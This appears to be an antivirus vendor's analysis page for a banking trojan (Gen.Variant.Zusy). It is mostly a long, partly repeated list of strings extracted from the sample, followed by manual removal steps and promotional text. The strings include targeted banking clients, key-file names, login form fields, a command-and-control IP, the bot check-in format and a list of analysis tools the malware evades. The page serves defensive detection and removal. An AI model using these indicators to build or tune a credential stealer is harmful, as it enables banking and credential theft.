Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_3500_rwx_01F40000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:1504
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
C:\Windows\AppPatch\rkousid.exe (2837 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Zusy.Elzob.8654_b9c91e6e54

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Zusy.Elzob.8654_b9c91e6e54

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet